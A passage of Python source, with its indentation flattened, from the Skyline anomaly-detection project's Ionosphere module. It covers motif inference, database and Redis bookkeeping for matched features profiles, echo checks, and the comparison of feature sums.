if not training_metric and not added_by == 'ionosphere_learn':
if IONOSPHERE_INFERENCE_MOTIFS_ENABLED and fp_ids:
try:
logger.info('calling inference to find matching similar motif')
start_inference = timer()
matched_motifs, fps_checked_for_motifs = ionosphere_motif_inference(base_name, metric_timestamp)
end_inference = timer()
logger.info('inference found %s matching similar motifs, checked %s fps in %6f seconds' % (
str(len(matched_motifs)), str(len(fps_checked_for_motifs)),
(end_inference - start_inference)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed calling ionosphere_motif_inference - %s' % e)
matched_motifs = {}
fps_checked_for_motifs = []
# @added 20210412 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
# Update the motif related columns of all the ionosphere fps
# that where checked
if len(fps_checked_for_motifs) > 0:
motif_checked_timestamp = int(time())
motif_checks_updated_count = 0
for fp_checked_for_motifs in fps_checked_for_motifs:
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_checked_for_motifs).
values(motif_checked_count=ionosphere_table.c.motif_checked_count + 1,
motif_last_checked=motif_checked_timestamp))
connection.close()
motif_checks_updated_count += 1
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update motif_checked_count and motif_last_checked for %s - %s' % (str(fp_checked_for_motifs), e))
logger.info('updated the motif_checked_count column and the motif_last_checked column to %s in ionosphere for %s fps' % (
str(motif_checked_timestamp), str(motif_checks_updated_count)))
if matched_motifs:
# Here we should update DB, clean up and return before incurring any
# features profiles calculations (unless in testing mode)
ordered_matched_motifs = []
matching_motif = []
for motif_id in list(matched_motifs.keys()):
try:
motif_metric_id = matched_motifs[motif_id]['metric_id']
motif_fp_id = matched_motifs[motif_id]['fp_id']
motif_fp_index = matched_motifs[motif_id]['index']
motif_dist = matched_motifs[motif_id]['distance']
motif_size = matched_motifs[motif_id]['size']
motif_matched_timestamp = matched_motifs[motif_id]['timestamp']
match_type_id = matched_motifs[motif_id]['type_id']
match_type = matched_motifs[motif_id]['type']
motif_sequence = matched_motifs[motif_id]['motif_sequence']
# @added 20210423 - Feature #4014: Ionosphere - inference
# Compute the area using the composite trapezoidal rule.
try:
motif_area = matched_motifs[motif_id]['motif_area']
except Exception as e:
dev_null = e
motif_area = 0
try:
fp_motif_area = matched_motifs[motif_id]['fp_motif_area']
except Exception as e:
dev_null = e
fp_motif_area = 0
# @added 20210427 - Feature #4014: Ionosphere - inference
# Compute the area using the composite trapezoidal rule.
try:
area_percent_diff = matched_motifs[motif_id]['area_percent_diff']
except Exception as e:
dev_null = e
area_percent_diff = 0
# @added 20210428 - Feature #4014: Ionosphere - inference
# Add time taken and fps checked
try:
fps_checked = matched_motifs[motif_id]['fps_checked']
except Exception as e:
dev_null = e
fps_checked = 0
try:
runtime = matched_motifs[motif_id]['runtime']
except Exception as e:
dev_null = e
runtime = 0
ordered_matched_motifs.append([motif_metric_id, motif_fp_id, motif_fp_index, motif_dist, motif_size, motif_matched_timestamp, match_type_id, match_type, motif_sequence, motif_area, fp_motif_area, area_percent_diff, fps_checked, runtime])
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine ordered_matched_motifs item')
# Sort by the best dist
if ordered_matched_motifs:
sorted_matched_motifs = sorted(ordered_matched_motifs, key=lambda x: x[3])
matching_motif = sorted_matched_motifs[0]
if matching_motif:
if not IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY:
redis_set = 'ionosphere.not_anomalous'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
redis_set = 'ionosphere.features_profiles_checked'
data = str(matching_motif[1])
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update matched details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update matched details in db for %s' % (str(fp_id)))
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('motifs_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_matched_table meta for %s' % base_name)
# Add all motif_matches to the DB
try:
motifs_matched_table, log_msg, trace = motifs_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('motifs_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get motifs_matched_table meta for %s' % base_name)
# @added 20210414 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
# Store the not anomalous motifs
try:
not_anomalous_motifs_table, log_msg, trace = not_anomalous_motifs_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('not_anomalous_motifs_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get not_anomalous_motifs_table meta for %s' % base_name)
new_motifs_matched_ids = []
for matched_motif in ordered_matched_motifs:
primary_match = 0
if matching_motif == matched_motif:
primary_match = 1
# Only a single ionosphere_matched record is created for
# the most similar motif (primary_match=1) HOWEVER
# DO NOTE that EVERY motif match that is surfaced is
# in a run is recorded in the motifs_matched table.
# ordered_matched_motifs.append([motif_metric_id, motif_fp_id, motif_fp_index, motif_dist, motif_size, motif_matched_timestamp, match_type_id, match_type, motif_sequence, motif_area, fp_motif_area, area_percent_diff])
try:
connection = engine.connect()
ins = motifs_matched_table.insert().values(
metric_id=int(matched_motif[0]),
fp_id=int(matched_motif[1]),
metric_timestamp=int(matched_motif[5]),
primary_match=primary_match,
index=int(matched_motif[2]),
size=int(matched_motif[4]),
distance=float(matched_motif[3]),
type_id=int(matched_motif[6]),
# @added 20210427 - Feature #4014: Ionosphere - inference
# Compute the area using the composite trapezoidal rule.
motif_area=float(matched_motif[9]),
fp_motif_area=float(matched_motif[10]),
area_percent_diff=float(matched_motif[11]),
# @added 20210428 - Feature #4014: Ionosphere - inference
# Add time taken and fps checked
fps_checked=int(matched_motif[12]),
runtime=float(matched_motif[13]))
result = connection.execute(ins)
connection.close()
new_motif_matched_id = result.inserted_primary_key[0]
new_motifs_matched_ids.append(new_motif_matched_id)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not insert motifs_matched record into DB: %s' % str(matched_motif))
# @added 20210414 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
# Store the not anomalous motifs
# @modified 20210419 - Feature #4014: Ionosphere - inference
# Only store motif data in the database if specifically
# enabled, inference.matched_motifs.dict file is always
# saved to the training_data dir
if new_motif_matched_id and IONOSPHERE_INFERENCE_STORE_MATCHED_MOTIFS:
new_motif_sequence_ids = []
try:
connection = engine.connect()
for motif_sequence_timestamp, motif_sequence_value in matched_motif[8]:
try:
ins = not_anomalous_motifs_table.insert().values(
motif_id=int(new_motif_matched_id),
timestamp=int(motif_sequence_timestamp),
value=motif_sequence_value)
result = connection.execute(ins)
new_motif_sequence_id = result.inserted_primary_key[0]
new_motif_sequence_ids.append(new_motif_sequence_id)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not insert %s, %s into not_anomalous_motifs for matched_motif_id: %s' % (
str(motif_sequence_timestamp),
str(motif_sequence_value),
str(new_motif_matched_id)))
connection.close()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not insert timestamps and values for into not_anomalous_motifs table: %s' % (
str(new_motif_matched_id)))
logger.info('inserted %s new motif sequence records into the not_anomalous_motifs table for matched_motif_id: %s' % (
str(len(new_motif_sequence_ids)), str(new_motif_matched_id)))
# If in testing mode no ionosphere tables are updated
if not IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY:
if matching_motif == matched_motif:
# Only a single ionosphere_matched record is created for
# the most similar motif (primary_match=1) HOWEVER
# DO NOTE that EVERY motif match that is surfaced is
# in a run is recorded in the motifs_matched table.
new_matched_id = 0
try:
connection = engine.connect()
ins = ionosphere_matched_table.insert().values(
fp_id=int(matching_motif[1]),
metric_timestamp=int(matching_motif[5]),
motifs_matched_id=int(new_motif_matched_id))
result = connection.execute(ins)
connection.close()
new_matched_id = result.inserted_primary_key[0]
logger.info('new ionosphere_matched id: %s (for matched motif with matched_motif_id: %s' % (
str(new_matched_id), str(new_motif_matched_id)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: could not create ionosphere_matched record for fp id %s and motif match with id %s for matching_motif: %s' % (
str(fp_id), str(new_motif_matched_id),
str(matching_motif)))
# ONLY fp of the most similar motif match gets as having
# been checked and matched
if new_matched_id:
# Update motif_matched_count in ionosphere_table
motif_matched_timestamp = int(time())
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == matching_motif[1]).
values(motif_matched_count=ionosphere_table.c.motif_matched_count + 1,
motif_last_matched=motif_matched_timestamp))
connection.close()
logger.info('updated motif_matched_count and motif_last_matched for fp_id %s for dur to matched_motif_id: %s' % (
str(matching_motif[1]), str(new_matched_id)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update motif_matched_count and motif_last_matched for fp_id %s for dur to matched_motif_id: %s' % (
str(matching_motif[1]), str(new_matched_id)))
# @added 20210429 - Feature #3994: Panorama - mirage not anomalous
# A hash is added to the ionosphere.panorama.not_anomalous_metrics for
# every metric that is found to be not anomalous.
try:
add_not_anomalous_to_redis_hash(base_name, metric_timestamp, anomalous_value, full_duration)
except Exception as e:
logger.error('error :: failed calling add_not_anomalous_to_redis_hash - %s' % e)
if not IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY:
profile_id_matched_file = '%s/%s.profile_id_matched.fp_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(profile_id_matched_file):
try:
write_data_to_file(skyline_app, profile_id_matched_file, 'w', str(matching_motif[1]))
logger.info('added matched fp_id %s - %s' % (
str(matching_motif[1]), profile_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: adding motif matched fp_id %s - %s' % (
str(matching_motif[1]), profile_id_matched_file))
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# Continue with normal features profile matching if no motifs were matched
context = skyline_app
f_calc = None
if not calculated_feature_file_found:
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
if f_calc:
send_metric_name = '%s.features_calculation_time' % skyline_app_graphite_namespace
f_calc_time = '%.2f' % float(f_calc)
try:
send_graphite_metric(skyline_app, send_metric_name, f_calc_time)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send calculate features')
if training_metric:
logger.info('training metric done')
# @added 20200908 -
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
# TODO: make ionosphere more useful, compare any other
# available training_metric profiles here and match, not in the
# db context, in the training context.
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
logger.error('error :: calculated features file not available - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20161213 - Branch #1790: test_tsfresh
# TODO: Match the test_tsfresh method
# Create an array of the calculated features
calculated_features = []
if calculated_feature_file_found:
calculated_features = get_calculated_features(calculated_feature_file)
if len(calculated_features) == 0:
logger.error('error :: no calculated features were determined from - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('%s calculated features determined' % (str(len(calculated_feature_file))))
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked = 0
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = 0
layers_checked_count = 0
# @added 20190314 - Feature #2484: FULL_DURATION feature profiles
# Here we add the bifurcation to also create a features
# profile at FULL_DURATION for all Mirage metrics. With a
# view to increase the number of matches trained metric
# achieve by also allowing for the creation and comparing of
# the FULL_DURATION features profiles as well.
echo_check = False
echo_calculated_feature_file = False
echo_calculated_feature_file_found = False
echo_calculated_features = []
echo_fp_ids = []
echo_anomalous_timeseries = None
if added_by == 'mirage':
try:
echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
echo_enabled = False
if echo_enabled:
echo_check = True
# @added 20200714 - Bug #3644: Do not apply ionosphere_busy to batch processing metrics
# Feature #3480: batch_processing
# Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# In the batch processing context do not apply the alternation between
# normal Ionosphere Mirage features profile checks and Ionosphere echo
# features profile checks when ionosphere_busy is set to True as it
# results in false positives on batch processing metrics where one check
# matches and the next does not, then the next does.
batch_metric = False
if echo_check and BATCH_PROCESSING:
# Batch processing metric
try:
batch_metric = is_batch_metric(skyline_app, base_name)
except:
batch_metric = False
if batch_metric and ionosphere_busy:
ionosphere_busy = False
logger.info('batch processing metric, ionosphere_busy has been changed from True to False to prevent switching between Mirage and echo fps')
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If there are more than 4 metric check files, alternate between normal
# Ionosphere Mirage features profile checks and Ionosphere echo features
# profile checks.
if echo_check:
if ionosphere_busy:
# Check the ionosphere_echo metric Redis keys to see which check
# to run, ionosphere or ionosphere_echo. If Ionosphere is busy,
# Ionosphere will alternate between normal Ionosphere features
# profiles (Mirage duration) and Ionosphere echo features
# profiles (FULL_DURATION) comparison.
echo_ionosphere_check_cache_key = 'ionosphere_echo.ionosphere.check.%s' % base_name
echo_ionosphere_check_key = False
try:
echo_ionosphere_check_key = self.redis_conn.get(echo_ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
echo_ionosphere_echo_check_cache_key = 'ionosphere_echo.echo.check.%s' % base_name
echo_ionosphere_echo_check_key = False
try:
echo_ionosphere_echo_check_key = self.redis_conn.get(echo_ionosphere_echo_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
create_ionosphere_echo_check_key = False
remove_ionosphere_echo_check_key = False
# If neither the ionosphere or the ionosphere_echo key exist do
# only check ionosphere
if not echo_ionosphere_check_key:
if not echo_ionosphere_echo_check_key:
echo_check = False
logger.info('ionosphere_busy - only running normal Mirage feature profiles checks, skipping ionosphere_echo checks')
create_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
# If the ionosphere_echo key exists only check ionosphere
if echo_ionosphere_echo_check_key:
echo_check = False
logger.info('ionosphere_busy - only running normal Mirage feature profiles checks, skipping ionosphere_echo checks')
create_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
remove_ionosphere_echo_check_key = echo_ionosphere_echo_check_cache_key
# If ionosphere_echo key exists only check ionosphere
if echo_ionosphere_check_key:
echo_check = True
logger.info('ionosphere_busy - skipping the normal Mirage feature profiles checks as run last time and running ionosphere_echo checks this time')
# Remove the Mirage features profiles from the
fp_ids = []
logger.info('ionosphere_busy - removed %s Mirage feature profile ids from fp_ids' % str(fp_count))
create_ionosphere_echo_check_key = echo_ionosphere_echo_check_cache_key
remove_ionosphere_echo_check_key = echo_ionosphere_check_cache_key
if remove_ionosphere_echo_check_key:
try:
self.redis_conn.delete(remove_ionosphere_echo_check_key)
logger.info(
'deleted Redis check key - %s' % (remove_ionosphere_echo_check_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to delete Redis check key - %s' % (remove_ionosphere_echo_check_key))
if create_ionosphere_echo_check_key:
try:
key_created_at = int(time())
self.redis_conn.setex(
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# create_ionosphere_echo_check_key, 300, [key_created_at])
create_ionosphere_echo_check_key, 300, key_created_at)
logger.info(
'created Redis check key - %s' % (create_ionosphere_echo_check_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to create Redis check key - %s' % (create_ionosphere_echo_check_key))
if echo_check:
try:
if fps_db_object:
for row in fps_db_object:
# @added 20201009 - Bug #3782: Exclude disabled echo features profile
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
if int(row['full_duration']) == int(settings.FULL_DURATION):
fp_ids.append(int(row['id']))
echo_fp_ids.append(int(row['id']))
logger.info('appending ionosphere_echo fp id %s matched full_duration of %s - %s' % (str(row['id']), str(settings.FULL_DURATION), base_name))
fp_count_with_echo = len(fp_ids)
echo_fp_count = len(echo_fp_ids)
if echo_fp_count == 0:
echo_check = False
if echo_fp_count > 0:
logger.info('added an additional %s echo fp ids for %s' % (str(echo_fp_count), base_name))
logger.info('determined a total of %s fp ids (incl. echo) for %s' % (str(fp_count_with_echo), base_name))
echo_calculated_feature_file = '%s/%s.echo.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
if os.path.isfile(echo_calculated_feature_file):
logger.info('echo calculated features available - %s' % (echo_calculated_feature_file))
echo_calculated_feature_file_found = True
else:
use_context = 'ionosphere_echo_check'
f_calc = None
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, use_context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
if os.path.isfile(echo_calculated_feature_file):
logger.info('echo calculated features available - %s' % (echo_calculated_feature_file))
echo_calculated_feature_file_found = True
echo_calculated_features = []
if echo_calculated_feature_file_found:
try:
echo_calculated_features = get_calculated_features(echo_calculated_feature_file)
except:
# 20190412 - just for debug
logger.error(traceback.format_exc())
logger.error('error :: ionosphere_echo_check no echo_calculated_features were determined')
echo_calculated_features = False
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to process echo')
# Compare calculated features to feature values for each fp id
not_anomalous = False
if calculated_feature_file_found:
for fp_id in fp_ids:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If the Ionosphere features profile checks are approaching the
# ionosphere_max_runtime, skip the remaining checks.
time_now_check = int(time())
# Allow 5 seconds for layers checks to be done
max_runtime_tolereance = ionosphere_max_runtime - 5
running_for = time_now_check - check_process_start
if running_for >= max_runtime_tolereance:
logger.info('features profile checks have been running for %s seconds, the ionosphere_max_runtime is about to be breached, skipping remaining features profile checks' % str(running_for))
break
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
check_type = 'ionosphere'
if echo_check:
for echo_fp_id in echo_fp_ids:
if fp_id == echo_fp_id:
check_type = 'ionosphere_echo_check'
if check_type == 'ionosphere_echo_check':
if not echo_calculated_features:
continue
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked += 1
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set instead of Manager().list to reduce memory
# self.features_profiles_checked.append(fp_id)
redis_set = 'ionosphere.features_profiles_checked'
data = str(fp_id)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
features_count = None
fp_features = []
# Get features for fp_id from z_fp_<metric_id> table where the
# features profile is the same full_duration
metric_fp_table = 'z_fp_%s' % str(metrics_id)
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for feature_id and values from %s' % metric_fp_table)
if not engine:
logger.error('error :: engine not obtained for feature_id and values from %s' % metric_fp_table)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
# First check to determine if the fp_id has data in memcache
# before querying the database
fp_id_feature_values = None
if settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
if python_version == 2:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
else:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not except
except:
# @modified 20200501 - Branch #3262: py3
# This is not an error if the data does not exist in
# memcache, it can be expected not to exists in
# memcache if it has not be used in a while.
# logger.error('error :: failed to get %s from memcache' % fp_id_feature_values_key)
logger.info('did not get %s from memcache, will query DB' % fp_id_feature_values_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if fp_id_feature_values:
fp_features = literal_eval(fp_id_feature_values)
logger.info('using memcache %s key data' % fp_id_feature_values_key)
if not fp_features:
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT feature_id, value FROM %s WHERE fp_id=%s' % (metric_fp_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_feature_id = int(row['feature_id'])
fp_value = float(row['value'])
fp_features.append([fp_feature_id, fp_value])
connection.close()
features_count = len(fp_features)
logger.info('determined %s features for fp_id %s' % (str(features_count), str(fp_id)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine feature_id, value from %s' % metric_fp_table)
if fp_features and settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
self.memcache_client.set(fp_id_feature_values_key, fp_features)
logger.info('populated memcache %s key' % fp_id_feature_values_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_feature_values_key)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added the calculated features sum for verification purposes
all_calc_features_sum_list = []
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
if check_type == 'ionosphere':
use_calculated_features = calculated_features
if check_type == 'ionosphere_echo_check':
use_calculated_features = echo_calculated_features
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# for feature_name, calc_value in calculated_features:
for feature_name, calc_value in use_calculated_features:
all_calc_features_sum_list.append(float(calc_value))
all_calc_features_sum = sum(all_calc_features_sum_list)
# Convert feature names in calculated_features to their id
logger.info('converting tsfresh feature names to Skyline feature ids')
calc_features_by_id = []
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# for feature_name, calc_value in calculated_features:
for feature_name, calc_value in use_calculated_features:
for skyline_feature_id, name in TSFRESH_FEATURES:
if feature_name == name:
calc_features_by_id.append([skyline_feature_id, float(calc_value)])
# Determine what features each data has, extract only values for
# common features.
logger.info('determining common features')
relevant_fp_feature_values = []
relevant_calc_feature_values = []
for skyline_feature_id, calc_value in calc_features_by_id:
for fp_feature_id, fp_value in fp_features:
if skyline_feature_id == fp_feature_id:
relevant_fp_feature_values.append(fp_value)
relevant_calc_feature_values.append(calc_value)
# Determine the sum of each set
relevant_fp_feature_values_count = len(relevant_fp_feature_values)
relevant_calc_feature_values_count = len(relevant_calc_feature_values)
if relevant_fp_feature_values_count != relevant_calc_feature_values_count:
logger.error('error :: mismatch in number of common features')
logger.error('error :: relevant_fp_feature_values_count - %s' % str(relevant_fp_feature_values_count))
logger.error('error :: relevant_calc_feature_values_count - %s' % str(relevant_calc_feature_values_count))
continue
else:
logger.info('comparing on %s common features' % str(relevant_fp_feature_values_count))
if relevant_fp_feature_values_count == 0:
logger.error('error :: relevant_fp_feature_values_count is zero')
continue
# Determine the sum of each set
sum_fp_values = sum(relevant_fp_feature_values)
sum_calc_values = sum(relevant_calc_feature_values)
logger.info(
'sum of the values of the %s common features in features profile - %s' % (
str(relevant_fp_feature_values_count), str(sum_fp_values)))
logger.info(
'sum of the values of the %s common features in the calculated features - %s' % (
str(relevant_calc_feature_values_count), str(sum_calc_values)))
# Determine whether each set is positive or negative
# # if the same carry on
# # if both negative, make then both positive
# Sum fp values, Sum calculated - handle negatives like features_sum :: -3389570699080000.0000000000
# Determine whether each set is positive or negative
# # if the same carry on
# # if both negative, make then both positive postive_sums
fp_sum_array = [sum_fp_values]
calc_sum_array = [sum_calc_values]
percent_different = 100
# @modified 20210425 - Task #4030: refactoring
# Feature #4014: Ionosphere - inference
# Use the common function added
# sums_array = np.array([sum_fp_values, sum_calc_values], dtype=float)
# try:
# calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
# percent_different = calc_percent_different[0]
# logger.info('percent_different between common features sums - %s' % str(percent_different))
# except:
# logger.error(traceback.format_exc())
# logger.error('error :: failed to calculate percent_different')
# continue
try:
percent_different = get_percent_different(sum_fp_values, sum_calc_values, True)
logger.info('percent_different between common features sums - %s' % str(percent_different))
except Exception as e:
logger.error('error :: failed to calculate percent_different - %s' % e)
continue
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
if almost_equal:
not_anomalous = True
# @modified 20170118 - Bug #1860: Debug learn not matched in ionosphere
# This broke it, no variable was interpolated
# logger.info('common features sums are almost equal, not anomalous' % str(relevant_fp_feature_values_count))
logger.info('common features sums are almost equal, not anomalous')
# @added 20161229 - Feature #1830: Ionosphere alerts
# Update the features profile checked count and time
logger.info('updating checked details in db for %s' % (str(fp_id)))
# update matched_count in ionosphere_table
checked_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update checked details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update checked details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(checked_count=ionosphere_table.c.checked_count + 1,
last_checked=checked_timestamp))
connection.close()
logger.info('updated checked_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update checked_count and last_checked for %s ' % str(fp_id))
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere':
use_percent_similar = float(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR)
if check_type == 'ionosphere_echo_check':
try:
use_percent_similar = float(settings.IONOSPHERE_ECHO_FEATURES_PERCENT_SIMILAR)
except:
use_percent_similar = 2.0
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
if percent_different < use_percent_similar:
not_anomalous = True
# log
logger.info('not anomalous - features profile match - %s' % base_name)
logger.info(
'calculated features sum are within %s percent of fp_id %s with %s, not anomalous' %
(str(use_percent_similar),
str(fp_id), str(percent_different)))
if check_type == 'ionosphere_echo_check':
logger.info('ionosphere_echo_check - not anomalous with fp id %s for %s' % (str(fp_id), base_name))
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
# Now if not matched use Min-Max scaling as per
# http://sebastianraschka.com/Articles/2014_about_feature_scaling.html#numpy
# Min-Max scale the fp time series z_ts_<metric_id> SELECT WHERE fp_id
# or from memcache to create minmax_fp_ts
# Min-Max scale the current time series to create minmax_anomalous_ts
# Create features profiles for minmax_fp_ts
# Create features profiles for minmax_anomalous_ts
try:
minmax_scaling_enabled = settings.IONOSPHERE_MINMAX_SCALING_ENABLED
except:
minmax_scaling_enabled = False
minmax_not_anomalous = False
minmax_check = False
minmax = 0
if not not_anomalous:
if minmax_scaling_enabled:
minmax_check = True
if added_by == 'ionosphere_learn' and minmax_check:
minmax_check = False
logger.info('ionosphere_learn job not minmax scaling')
if minmax_check:
logger.info('running minmax scaling')
# First check to determine if the z_ts_<mertic_id> for the fp
# has data in memcache before querying the database
metric_fp_ts_table = 'z_ts_%s' % str(metrics_id)
fp_id_metric_ts = []
if settings.MEMCACHE_ENABLED:
# @added 20200421 - Task #3304: py3 - handle pymemcache bytes not str
# Explicitly set the fp_id_metric_ts_object so it
# always exists to be evaluated
fp_id_metric_ts_object = None
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
if python_version == 2:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
else:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not except
except:
# @modified 20200501 - Branch #3262: py3
# This is not an error if the data does not exist in
# memcache, it can be expected not to exists in
